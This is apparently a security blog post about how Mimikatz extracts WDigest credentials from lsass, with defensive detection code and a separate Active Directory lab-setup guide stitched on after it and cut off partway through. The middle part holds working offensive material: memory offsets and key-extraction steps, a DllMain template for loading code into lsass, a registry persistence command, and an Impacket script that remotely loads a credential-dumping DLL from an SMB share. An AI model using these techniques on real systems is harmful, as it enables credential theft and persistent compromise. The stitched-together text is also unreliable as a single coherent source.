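address in SAMPLE_EVENTS are constructed for the demo.
"""
import re

# Win32 process access rights (documented values); VM_READ is what a
# credential dumper needs to read lsass memory.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Images that routinely open lsass with broad rights. Constructed, lower-case
# paths; tune per environment, and keep the list short.
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\lsass.exe",
}

# Lazy value match that stops before the next ' Key=' token or end of line,
# so values containing spaces (paths, timestamps) survive.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line):
    """Turn one constructed 'Key=value ...' record into a dict."""
    return {k: v.strip() for k, v in FIELD_RE.findall(line.strip())}


def assess_lsass_access(event):
    """Return None if the access is uninteresting, else (severity, reasons)."""
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    if source in ALLOWLIST:
        return None
    access = int(event.get("GrantedAccess", "0x0"), 16)
    if not access & (PROCESS_VM_READ | PROCESS_VM_WRITE):
        return None  # query-only handles cannot read credential material
    reasons = ["PROCESS_VM_READ/PROCESS_VM_WRITE granted on lsass.exe"]
    severity = "medium"
    if "UNKNOWN" in event.get("CallTrace", ""):
        reasons.append("call stack contains unbacked (UNKNOWN) frames")
        severity = "high"
    if not source.startswith("c:\\windows\\"):
        reasons.append("source image outside the Windows directory")
        severity = "high"
    return severity, reasons


def scan_events(lines):
    """Return (SourceImage, GrantedAccess, severity, reasons) per finding."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        verdict = assess_lsass_access(ev)
        if verdict:
            findings.append((ev.get("SourceImage"), ev.get("GrantedAccess"),
                             verdict[0], verdict[1]))
    return findings


SAMPLE_EVENTS = [
    # svchost querying lsass with limited rights: no memory read, ignored
    r"UtcTime=2024-03-01 10:00:01.000 SourceImage=C:\Windows\System32\svchost.exe "
    r"TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000 "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234",
    # Defender engine with full access: allowlisted
    r"UtcTime=2024-03-01 10:00:02.000 SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe "
    r"TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234",
    # Task Manager style read from a Windows binary: medium, needs triage
    r"UtcTime=2024-03-01 10:00:03.000 SourceImage=C:\Windows\System32\taskmgr.exe "
    r"TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410 "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\KERNELBASE.dll+2e0a3",
    # tool in a user profile reading lsass from unbacked code: high
    r"UtcTime=2024-03-01 10:00:04.000 SourceImage=C:\Users\bob\Downloads\tool.exe "
    r"TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010 "
    r"CallTrace=C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(0000020A5F2B1C00)",
]

if __name__ == "__main__":
    for image, mask, severity, reasons in scan_events(SAMPLE_EVENTS):
        print(f"[{severity}] {image} opened lsass with {mask}: {'; '.join(reasons)}")
```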

I’ve been toying with the idea of stripping down Mimikatz for certain engagements (mainly those where exfiltrating a memory dump isn’t feasible or permitted), but it has been bugging me for a while that I’ve spent so long working with a tool that I’ve rarely reviewed low-level.

So I wanted to change this and explore some of its magic, starting with where it all began, WDigest. Specifically, looking at how cleartext credentials are actually cached in lsass, and how they are extracted out of memory with "sekurlsa::wdigest". This will mean disassembly and debugging, but hopefully by the end you will see that while it's difficult to duplicate the amount of effort that has gone into Mimikatz, if your aim is to only use a small portion of the available functionality, it may be worth crafting a custom tool based on the Mimikatz source code, rather than opting to take along the full suite.

To finish off the post I will also explore some additional methods of loading arbitrary DLLs within lsass, which can hopefully be combined with the code examples demonstrated.

Note: This post uses Mimikatz source code heavily as well as the countless hours dedicated to it by its developer(s). This effort should become more apparent as you see undocumented structures which are suddenly revealed when browsing through code. Thanks to Mimikatz, Benjamin Delpy and Vincent Le Toux for their awesome work.

How does Mimikatz’s “sekurlsa::wdigest” actually work?

As mentioned, the feature we will look at in this post is WDigest, arguably the feature that Mimikatz became most famous for. WDigest credential caching was of course enabled by default up until Windows Server 2008 R2, after which caching of plain-text credentials was disabled.

When reversing an OS component, I usually like to attach a debugger and review how it interacts with the OS during runtime. Unfortunately in this case this isn’t going to be just as simple as attaching WinDBG to lsass, as pretty quickly you’ll see Windows grind to a halt before warning you of a pending reboot. Instead we’ll have to attach to the kernel and switch over to the lsass process from Ring-0.

With a kernel debugger attached, we need to grab the EPROCESS address of the lsass process, which is found with the !process 0 0 lsass.exe command:

With the EPROCESS address identified (ffff9d01325a7080 above), we can request that our debug session is switched to the lsass process context:

A simple lm will show that we now have access to the WDigest DLL memory space:

If at this point you find that symbols are not processed correctly, a .reload /user will normally help.

With the debugger attached, let’s dig into WDigest.

Diving into wdigest.dll and a little of lsasrv.dll

If we look at Mimikatz source code, we can see that the process of identifying credentials in memory is to scan for signatures. Let’s take the opportunity to use a tool which appears to be in vogue at the minute, Ghidra, and see what Mimikatz is hunting for.

As I’m currently working on Windows 10 x64, I’ll focus on the PTRN_WIN6_PasswdSet signature seen below:

After providing this search signature to Ghidra, we reveal what Mimikatz is scanning memory for:

Above we have the function LogSessHandlerPasswdSet. Specifically the signature references just beyond the l_LogSessList pointer. This pointer is key to extracting credentials from WDigest, but before we get ahead of ourselves, let’s back up and figure out what exactly is calling this function by checking for cross references, which lands us here:

Here we have SpAcceptCredentials which is an exported function from WDigest.dll, but what does this do?

This looks promising as we can see that credentials are passed via this callback function. Let’s confirm that we are in the right place. In WinDBG we can add a breakpoint with bp wdigest!SpAcceptCredentials after which we use the runas command on Windows to spawn a shell:

This should be enough to trigger the breakpoint. Inspecting the arguments to the call, we can now see credentials being passed in:

If we continue with our execution and add another breakpoint on wdigest!LogSessHandlerPasswdSet, we find that although our username is passed, a parameter representing our password cannot be seen. However, if we look just before the call to LogSessHandlerPasswdSet, what we find is this:

This is actually a stub used for Control Flow Guard (Ghidra 9.0.3 looks like it has an improvement for displaying CFG stubs), but following along in a debugger shows us that the call is actually to LsaProtectMemory:

This is expected as we know that credentials are stored encrypted within memory. Unfortunately LsaProtectMemory isn’t exposed outside of lsass, so we need to know how we can recreate its functionality to decrypt extracted credentials. Following with our disassembler shows that this call is actually just a wrapper around LsaEncryptMemory:

And LsaEncryptMemory is actually just wrapping calls to BCryptEncrypt:

Interestingly, the encryption/decryption function is chosen based on the length of the provided blob of data to be encrypted. If the length of the buffer is divisible by 8 (denoted by the "param_2 & 7" bitwise operation in the screenshot above), then AES is used; failing this, 3DES is used.

So we now know that our password is encrypted by BCryptEncrypt, but what about the key? Well if we look above, we actually see references to lsasrv!h3DesKey and lsasrv!hAesKey. Tracing references to these addresses shows that lsasrv!LsaInitializeProtectedMemory is used to assign each an initial value. Specifically each key is generated based on calls to BCryptGenRandom:

This means that a new key is generated randomly each time lsass starts, which will have to be extracted before we can decrypt any cached WDigest credentials.

Back to the Mimikatz source code to confirm that we are not going too far off track, we see that there is indeed a hunt for the LsaInitializeProtectedMemory function, again with a comprehensive list of signatures for differing Windows versions and architectures:

And if we search for this within Ghidra, we see that it lands us here:

Here we see a reference to the hAesKey address. So, similar to the above signature search, Mimikatz is hunting for cryptokeys in memory.

Next we need to understand just how Mimikatz goes about pulling the keys out of memory. For this we need to refer to kuhl_m_sekurlsa_nt6_acquireKey within Mimikatz, which highlights the lengths that this tool goes to in supporting different OS versions. We see that hAesKey and h3DesKey (which are of the type BCRYPT_KEY_HANDLE returned from BCryptGenerateSymmetricKey) actually point to a struct in memory consisting of fields including the generated symmetric AES and 3DES keys. This struct can be found documented within Mimikatz:

typedef struct _KIWI_BCRYPT_HANDLE_KEY {
    ULONG size;
    ULONG tag;    // 'UUUR'
    PVOID hAlgorithm;
    PKIWI_BCRYPT_KEY key;
    PVOID unk0;
} KIWI_BCRYPT_HANDLE_KEY, *PKIWI_BCRYPT_HANDLE_KEY; 

We can correlate this with WinDBG to make sure we are on the right path by checking for the “UUUR” tag referenced above:

At offset 0x10 we see that Mimikatz is referencing PKIWI_BCRYPT_KEY which has the following structure:

typedef struct _KIWI_BCRYPT_KEY81 {
    ULONG size;
    ULONG tag;    // 'MSSK'
    ULONG type;
    ULONG unk0;
    ULONG unk1;
    ULONG unk2; 
    ULONG unk3;
    ULONG unk4;
    PVOID unk5;    // before, align in x64
    ULONG unk6;
    ULONG unk7;
    ULONG unk8;
    ULONG unk9;
    KIWI_HARD_KEY hardkey;
} KIWI_BCRYPT_KEY81, *PKIWI_BCRYPT_KEY81;

And sure enough, following along with WinDBG reveals the same referenced tag:

The final member of this struct is a reference to what Mimikatz names KIWI_HARD_KEY, which contains the following:

typedef struct _KIWI_HARD_KEY {
    ULONG cbSecret;
    BYTE data[ANYSIZE_ARRAY]; // etc...
} KIWI_HARD_KEY, *PKIWI_HARD_KEY;

This struct consists of the size of the key as cbSecret, followed by the actual key in the data field. This means we can use WinDBG to extract this key with:

This gives us our h3DesKey which is 0x18 bytes long consisting of
b9 a8 b6 10 ee 85 f3 4f d3 cb 50 a6 a4 88 dc 6e ee b3 88 68 32 9a ec 5a.

Knowing this, we can follow the same process to extract hAesKey:

Now that we understand just how keys are extracted, we need to hunt for the actual credentials cached by WDigest. Let’s go back to the l_LogSessList pointer we discussed earlier. This field corresponds to a linked list, which we can walk through using the WinDBG command !list -x "dq @$extret" poi(wdigest!l_LogSessList):

These entries have the following structure:

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    ULONG    UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

Following this struct are three LSA_UNICODE_STRING fields found at the following offsets:

  • 0x30 – Username
  • 0x40 – Hostname
  • 0x50 – Encrypted Password

Again we can check that we are on the right path with WinDBG using a command such as:

!list -x "dS @$extret+0x30" poi(wdigest!l_LogSessList)

This will dump cached usernames as:

And finally we can dump the encrypted password using a similar command:

!list -x "db poi(@$extret+0x58)" poi(wdigest!l_LogSessList)

And there we have it, all the pieces required to extract WDigest credentials from memory.

So now that we have all the information needed for the extraction and decryption process, how feasible would it be to piece this together into a small standalone tool outside of Mimikatz? To explore this I’ve created a heavily commented POC which is available here. When executed on Windows 10 x64 (build 1809), it provides verbose information on the process of extracting creds:

By no means should this be considered OpSec safe, but it will hopefully give an example of how we can go about crafting alternative tooling.

Now that we understand how WDigest cached credentials are grabbed and decrypted, we can move onto another area affecting the collection of plain-text credentials, “UseLogonCredential”.

But UseLogonCredential is 0

So as we know, with everyone running around dumping cleartext credentials, Microsoft decided to disable support for this legacy protocol by default. Of course there will be some users who may be using WDigest, so to provide the option of re-enabling this, Microsoft pointed to a registry key of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential. Toggling this from ‘0’ to ‘1’ forces WDigest to start caching credentials again, which of course meant that pentesters were back in the game… however there was a catch, toggling this setting required a reboot of the OS, and I’ve yet to meet a client who would allow this outside of a test environment.

The obvious question is… why do you need to reboot the machine for this to take effect?

Edit: As pointed out by GentilKiwi, a reboot isn’t required for this change to take effect. I’ve added a review of why this is at the end of this section.

Let’s take a look at SpAcceptCredentials again, and after a bit of hunting we find this:

Here we can clearly see that there is a check for two conditions using global variables. If g_IsCredGuardEnabled is set to 1, or g_fParameter_UseLogonCredential is set to 0, we find that the code path taken is via LogSessHandlerNoPasswordInsert rather than the above LogSessHandlerPasswdSet call. As the name suggests, this function caches the session but not the password, resulting in the behaviour we normally encounter when popping Windows 2012+ boxes. It’s therefore reasonable to assume that this variable is controlled by the above registry key value based on its name, and we find this to be the case by tracing its assignment:

By understanding what variables within WDigest.dll control credential caching, can we subvert this without updating the registry? What if we update that g_fParameter_UseLogonCredential parameter during runtime with our debugger?

Resuming execution, we see that cached credentials are stored again:

Of course most things are possible when you have a kernel debugger hooked up, but if you have a way to manipulate lsass memory without triggering AV/EDR (see our earlier Cylance blog post for one example of how you would do this), then there is nothing stopping you from crafting a tool to manipulate this variable. Again I’ve created a heavily verbose tool to demonstrate how this can be done which can be found here.

This example will hunt for and update the g_fParameter_UseLogonCredential value in memory. If you are operating against a system protected with Credential Guard, the modifications required to also update this value are trivial and left as an exercise to the reader.

With our POC executed, we find that WDigest has now been re-enabled without having to set the registry key, allowing us to pull out credentials as they are cached:

Again this POC should not be considered as OpSec safe, but used as a verbose example of how you can craft your own.

Now of course this method of enabling WDigest comes with risks, mainly the WriteProcessMemory call into lsass, but if suited to the environment it offers a nice way to enable WDigest without setting a registry value. There are also other methods of acquiring plain-text credentials which may be more suited to your target outside of WDigest (memssp for one, which we will review in a further post).

Edit: As pointed out by GentilKiwi, a reboot is not required for UseLogonCredential to take effect… so back to the disassembler we go.

Reviewing other locations referencing the registry value, we find wdigest!DigestWatchParamKey which monitors a number of keys including:

The Win32 API used to trigger this function on update is RegNotifyChangeKeyValue:

And if we add a breakpoint on wdigest!DigestWatchParamKey in WinDBG, we see that this is triggered as we attempt to add a UseLogonCredential:
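
Because WDigest watches its parameter key with RegNotifyChangeKeyValue, a change to UseLogonCredential is live the moment it is written, so from the defensive side the value is something to audit and monitor rather than a reboot-gated setting. The PowerShell below is an added example and is not code from the original post: it reads the UseLogonCredential value and Credential Guard state discussed above, plus RunAsPPL (which decides whether an administrator can write into lsass memory at all), and reports the host's caching posture. The function names are my own.

```powershell
# Added example (not code from the original post): report whether this host
# can cache WDigest plain-text credentials. Read-only; run from an elevated
# PowerShell. Function names are my own.

function Get-WDigestCachingPosture {
    [CmdletBinding()]
    param()

    $wdigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $lsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # UseLogonCredential: on current Windows, absent or 0 keeps
    # g_fParameter_UseLogonCredential at 0, so new logons take the
    # LogSessHandlerNoPasswordInsert path; 1 turns caching back on.
    $useLogonCred = (Get-ItemProperty -Path $wdigestKey -Name UseLogonCredential `
                        -ErrorAction SilentlyContinue).UseLogonCredential

    # Credential Guard: SecurityServicesRunning contains 1 when it is active,
    # which is the g_IsCredGuardEnabled condition seen in SpAcceptCredentials.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuardRunning = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)

    # RunAsPPL: with LSASS as a protected process an administrator cannot
    # WriteProcessMemory into it, so patching the variable in memory is not possible.
    $runAsPpl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL

    $findings = @()
    if ($useLogonCred -eq 1) {
        $findings += 'UseLogonCredential=1: WDigest caches plain-text passwords for new logons'
    }
    if (-not $credGuardRunning) {
        $findings += 'Credential Guard not running: caching is controlled by the registry value alone'
    }
    if ($runAsPpl -ne 1) {
        $findings += 'RunAsPPL not set: lsass memory is writable by local administrators'
    }

    $useLogonCredText = if ($null -eq $useLogonCred) { 'not set (caching off)' } else { $useLogonCred }

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        UseLogonCredential = $useLogonCredText
        CredentialGuard    = $credGuardRunning
        RunAsPPL           = ($runAsPpl -eq 1)
        Findings           = $findings
    }
}

# Set the value explicitly to 0 instead of leaving it absent: a later change
# to 1 is then a modification of an existing value, and with a SACL on the
# key it produces an Event ID 4657 record you can alert on.
function Disable-WDigestCaching {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $wdigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    if ($PSCmdlet.ShouldProcess($wdigestKey, 'Set UseLogonCredential = 0 (DWORD)')) {
        New-ItemProperty -Path $wdigestKey -Name UseLogonCredential -PropertyType DWord -Value 0 -Force | Out-Null
    }
}

Get-WDigestCachingPosture | Format-List
```

Disable-WDigestCaching supports -WhatIf, so it can be dry-run on a fleet before enforcing. Note that the audit reads the registry, not the live g_fParameter_UseLogonCredential variable: the in-memory patch described next leaves the registry untouched, which is exactly why RunAsPPL and Credential Guard appear in the report.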

Bonus Round – Loading an arbitrary DLL into LSASS

So while digging around with a disassembler I wanted to look for an alternative way to load code into lsass while avoiding potentially hooked Win32 API calls, or by loading an SSP. After a bit of disassembly, I came across the following within lsasrv.dll:

This attempt to call LoadLibraryExW on a user provided value can be found within the function LsapLoadLsaDbExtensionDll and allows us to craft a DLL to be loaded into the lsass process, for example:

#include <Windows.h>

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:

        // Insert l33t payload here

        break;
    }

    // Important to avoid BSOD: returning FALSE makes LoadLibraryExW fail,
    // so LsapLoadLsaDbExtensionDll never reaches the following GetProcAddress
    return FALSE;
}

It is important that at the end of the DllMain function, we return FALSE to force an error on LoadLibraryEx. This is to avoid the subsequent call to GetProcAddress. Failing to do this will result in a BSOD on reboot until the DLL or registry key is removed.

With a DLL crafted, all that we then need to do is create the above registry key:

New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "C:\xpnsec.dll"

Loading of the DLL will occur on system reboot, which makes it a potential persistence technique for privileged compromises, pushing your payload straight into lsass (as long as PPL isn’t enabled of course).

Bonus Round 2 – Loading arbitrary DLL into LSASS remotely

After some further hunting, a similar vector to that above was found within samsrv.dll. Again a controlled registry value is loaded into lsass by a LoadLibraryEx call:

Again we can leverage this by adding a registry key and rebooting, however triggering this case is a lot simpler as it can be fired using SAMR RPC calls.

Let’s have a bit of fun by using our above WDigest credential extraction code to craft a DLL which will dump credentials for us.

To load our DLL, we can use a very simple Impacket Python script to modify the registry and add a value at HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using the hSamrConnect RPC call. The code looks like this:

from impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt, samr
from impacket.smbconnection import SMBConnection


def trigger_samr(remoteHost, username, password):
    print("[*] Connecting to SAMR RPC service")
    try:
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\samr', username, password, "", "", "", "")
        dce = rpctransport.get_dce_rpc()
        dce.connect()
        dce.bind(samr.MSRPC_UUID_SAMR)
    except Exception as e:
        print("[x] Error binding to SAMR: %s" % e)
        return
    print("[*] Connection established, triggering SamrConnect to force load the added DLL")
    # Trigger
    samr.hSamrConnect(dce)
    print("[*] Triggered, DLL should have been executed...")


def start(remoteName, remoteHost, username, password, dllPath):
    winreg_bind = r'ncacn_np:445[\pipe\winreg]'
    hRootKey = None
    subkey = None
    rrpclient = None
    print("[*] Connecting to remote registry")
    try:
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg', username, password, "", "", "", "")
    except Exception as e:
        print("[x] Error establishing SMB connection: %s" % e)
        return
    try:
        # Set up winreg RPC
        rrpclient = rpctransport.get_dce_rpc()
        rrpclient.connect()
        rrpclient.bind(rrp.MSRPC_UUID_RRP)
    except Exception as e:
        print("[x] Error binding to remote registry: %s" % e)
        return
    print("[*] Connection established")
    print("[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt")
    try:
        # Add a new registry value (type 1 = REG_SZ)
        ans = rrp.hOpenLocalMachine(rrpclient)
        hRootKey = ans['phKey']
        subkey = rrp.hBaseRegOpenKey(rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS")
        rrp.hBaseRegSetValue(rrpclient, subkey["phkResult"], "DirectoryServiceExtPt", 1, dllPath)
    except Exception as e:
        print("[x] Error communicating with remote registry: %s" % e)
        return
    print("[*] Registry value created, DLL will be loaded from %s" % (dllPath))
    trigger_samr(remoteHost, username, password)
    print("[*] Removing registry entry")
    try:
        rrp.hBaseRegDeleteValue(rrpclient, subkey["phkResult"], "DirectoryServiceExtPt")
    except Exception as e:
        print("[x] Error deleting from remote registry: %s" % e)
        return
    print("[*] All done")


print("LSASS DirectoryServiceExtPt POC\n @_xpn_\n")
start("192.168.0.111", "192.168.0.111", "test", "wibble", "\\\\opensharehost\\ntds\\legit.dll")

And in practice, we can see credentials pulled from memory:

The code for the DLL used can be found here, which is a modification of the earlier example.
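
Both bonus rounds hinge on registry values under Services\NTDS (LsaDbExtPt and DirectoryServiceExtPt) that do not exist on a default installation, which makes their presence a cheap thing to audit on domain controllers. The PowerShell below is an added example and is not part of the original post or the POCs it links; the function name is my own. It reports each value, whether the configured DLL is a local signed file or a network path, and whether RunAsPPL would have blocked the load in the first place.

```powershell
# Added example (not code from the original post): audit the two LSASS
# extension points in the NTDS service key on a domain controller.
# Function name is my own. Read-only.

function Get-LsassExtensionPointAudit {
    [CmdletBinding()]
    param()

    $ntdsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS'
    $lsaKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # With RunAsPPL the loader only accepts Microsoft-signed images inside
    # lsass, which is the "as long as PPL isn't enabled" condition above.
    $runAsPpl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL

    foreach ($valueName in 'LsaDbExtPt', 'DirectoryServiceExtPt') {
        $dllPath = (Get-ItemProperty -Path $ntdsKey -Name $valueName -ErrorAction SilentlyContinue).$valueName

        if ($null -eq $dllPath) {
            $signature = $null
            $verdict   = 'absent (expected on a default install)'
        }
        else {
            # The value goes straight to LoadLibraryExW, so a UNC path means the
            # DLL is fetched over SMB at load time, as in the remote variant.
            $sig = $null
            if (Test-Path -LiteralPath $dllPath -PathType Leaf) {
                $sig = Get-AuthenticodeSignature -FilePath $dllPath
            }
            $signature = if ($sig) { "$($sig.Status) $($sig.SignerCertificate.Subject)" } else { 'file not reachable' }
            $verdict = if ($dllPath -like '\\*') { 'SUSPICIOUS: DLL loaded from a network path' }
                       elseif ($sig -and $sig.Status -eq 'Valid') { 'present and signed: confirm it belongs to an expected product' }
                       else { 'SUSPICIOUS: unsigned or missing DLL configured' }
        }

        [pscustomobject]@{
            ValueName = $valueName
            DllPath   = $dllPath
            Signature = $signature
            RunAsPPL  = ($runAsPpl -eq 1)
            Verdict   = $verdict
        }
    }
}

Get-LsassExtensionPointAudit | Format-Table -AutoSize
```

For continuous monitoring rather than a point-in-time audit, the same two value names are what to watch in Sysmon Event ID 13 (registry value set) on DCs, paired with Sysmon Event ID 7 (image loaded) for any image in lsass.exe that is not Microsoft-signed; the remote variant additionally arrives over the winreg named pipe, which object-access auditing records as Event ID 5145 against IPC$.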

So hopefully this post has given you an idea as to how WDigest credential caching works and how Mimikatz goes about pulling and decrypting passwords during "sekurlsa::wdigest". More importantly I hope that it will help anyone looking to craft something custom for their next assessment. I’ll be continuing by looking at other areas which are commonly used during an engagement, but if you have any questions or suggestions, give me a shout at the usual places.

Automated Lab: Automate Your Active Directory Security Lab

Building an Active Directory security lab is not easy; it requires time, resources and skills. What if we had an automated way of doing all the hard work?

Well, that's where AutomatedLab comes in: https://github.com/AutomatedLab/AutomatedLab

AutomatedLab (abbreviated as AL) is an automated build framework for Windows environments developed by Microsoft. You can use it to create labs in a variety of Active Directory configurations. Besides a local Hyper-V host, it can also deploy to Azure. What I personally think is most powerful is that by passing the lab build script (.ps1) to another person, they can build the identical environment. I think this is ideal for training and general learning.

Alright, let’s use AutomatedLab to automatically build the ideal Active Directory lab environment!

AutomatedLab (AL) enables you to:

  • Set up lab and test environments
  • On Hyper-V or Azure, with multiple products
  • Or just a single VM, quickly

Requires one of:

  • .NET 4.7.1 (Windows PowerShell)
  • .NET Core 2+ (PowerShell 6+)

Requires one of:

  • Hyper-V host
  • Azure subscription

And finally:

  • Operating system DVD ISO images

Installation

There are two options for installing AutomatedLab:

  • Use the MSI installer published on GitHub.
  • Install from the PowerShell Gallery using the Install-Module cmdlet. Note that this is the ONLY way to install AutomatedLab and its dependencies in PowerShell Core/PowerShell 7, on both Windows and Linux/Azure Cloud Shell.

Install-PackageProvider Nuget -Force
Install-Module AutomatedLab -AllowClobber

# If you are on Linux and are not starting pwsh with sudo
# This needs to be executed only once per user - adjust according to your needs!
Set-PSFConfig -Module AutomatedLab -Name LabAppDataRoot -Value /home/youruser/.alConfig -PassThru | Register-PSFConfig

# Prepare sample content - modify to your needs

# Windows
New-LabSourcesFolder -Drive C

# Linux
Set-PSFConfig -Module AutomatedLab -Name LabSourcesLocation -Value /home/youruser/labsources -PassThru | Register-PSFConfig
New-LabSourcesFolder # Linux

From MSI

AutomatedLab (AL) is a bunch of PowerShell modules. To make the installation process easier, it is provided as an MSI.

Download Link: https://github.com/AutomatedLab/AutomatedLab/releases

There are not many choices when installing AL.

The options Typical and Complete are actually doing the same and install AL to the default locations. The PowerShell modules go to “C:\Program Files\WindowsPowerShell\Modules”, the rest to “C:\LabSources”.

As LabSources can grow quite big, you should go for a custom installation and put this component on a disk with enough free space to store the ISO files. This disk does not have to be an SSD. Do not change the location of the modules unless you really know what you are doing.

Very important to AL is the LabSources folder that should look like this:

If all that worked, you are ready to go.

Demo: See the power of AutomatedLab!

With AutomatedLab set up, try running the following PowerShell script with administrator privileges.

New-LabDefinition -Name Lab1 -DefaultVirtualizationEngine HyperV

Add-LabMachineDefinition -Name DC1 -Memory 1GB -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)' -Roles RootDC -DomainName contoso.com
Add-LabMachineDefinition -Name Client1 -Memory 1GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName contoso.com

Install-Lab

Show-LabDeploymentSummary -Detailed

Running this creates a Windows Server 2019 domain controller and a Windows 10 client on Hyper-V.

In just four lines, Windows Server and Windows 10 are installed, Active Directory is built, and the Windows 10 client is domain-joined.
How exciting!

Setup

Let's set it up right away. Running virtual machines requires a reasonably specced machine. You will also need to download the operating system ISO files, so it may take some time if you start from scratch, depending heavily on your Internet speed.

Requirements

You need plenty of memory, storage and CPU: an environment that can run multiple virtual machines at the same time.
At least 8 GB of memory, depending on how many virtual machines run simultaneously; 16 GB or 32 GB is recommended depending on the number of virtual machines you are going to create.

With storage as SSD, especially with NVMe SSD , the build time will be very fast.

Next step…

Keep the following enabled:
  • Intel VT-x / AMD-V in the BIOS/UEFI settings
  • Hyper-V and its related features under Windows Features (Turn Windows features on or off)

Regarding conflicts with other virtualization software such as VMware Workstation: from Windows 10 version 2004, VMware Workstation supports running on the Hyper-V platform.
If you want to run both in parallel, update to Windows 10 2004. Before 2004, you have no choice but to uninstall the other virtualization software.
VirtualBox also appears to be compatible with the Hyper-V platform.

Installation

Install AutomatedLab
Start Powershell with administrator privileges and execute the following command.
Note: installation using msi may not be able to install all the necessary modules, so I do not recommend it.

Install-Module AutomatedLab -Force -AllowClobber

If you don’t have NuGet on your computer, you’ll be prompted to install NuGet, so follow the instructions to install it.

Installing LabSources
Once AutomatedLab is installed, install LabSources. LabSources is the folder where AL keeps lab content such as ISOs, tools and sample scripts.

> New-LabSourcesFolder

* If you want to install on another drive, specify it with -DriveLetter (e.g. "-DriveLetter D").

Getting an error when executing an AutomatedLab command

When you try to execute an AutomatedLab command, including this one, the following error may occur:

The 'New-LabSourcesFolder' command was found in module 'AutomatedLab', but this module could not be loaded.

This is due to PowerShell's execution policy, and there are two ways to resolve it:
1.  Permanently relax the execution policy
2.  Temporarily relax the execution policy by passing -ExecutionPolicy Bypass (abbreviated -Exec Bypass) each time you start PowerShell. * In this case, it is necessary to run "Import-Module AutomatedLab" every time you use AL.

The execution policy can be changed temporarily at launch as in option 2, but when you later create lab configurations in PowerShell ISE, option 2 does not apply there and the scripts will be blocked by the execution policy, so choose option 1.

Set-ExecutionPolicy Unrestricted

* Execute with administrator privileges

If you are concerned about security, return to the Restricted policy when you no longer use AL.
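
The requirement checks above (VT-x/AMD-V, the Hyper-V feature, memory, Windows 10 2004 for coexistence with VMware) and the execution-policy question can be scripted into one pre-flight check. The following is an added example, not from the original post or from AutomatedLab itself; the function names and the -MinimumMemoryGB threshold are mine. It also shows the narrower alternative to Set-ExecutionPolicy Unrestricted: RemoteSigned in CurrentUser scope is enough to run your own lab .ps1 files, including from PowerShell ISE, without opening the policy for every account on the host.

```powershell
# Added example (not from the original post or AutomatedLab): check the host
# requirements listed above before installing AL. Function names and the
# memory threshold are my own. Run from an elevated Windows PowerShell.

function Test-ALHostPrerequisites {
    [CmdletBinding()]
    param(
        [int]$MinimumMemoryGB = 8   # the post's minimum; 16-32 GB recommended
    )

    $cs      = Get-CimInstance -ClassName Win32_ComputerSystem
    $totalGB = [math]::Round($cs.TotalPhysicalMemory / 1GB, 1)
    $build   = [System.Environment]::OSVersion.Version.Build

    # Hyper-V as a Windows feature (client SKUs); on Windows Server use Get-WindowsFeature Hyper-V
    $hyperV = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All -ErrorAction SilentlyContinue

    # Effective execution policy decides whether your lab .ps1 files will run
    $policy = Get-ExecutionPolicy

    $al = Get-Module -ListAvailable -Name AutomatedLab | Sort-Object Version -Descending | Select-Object -First 1
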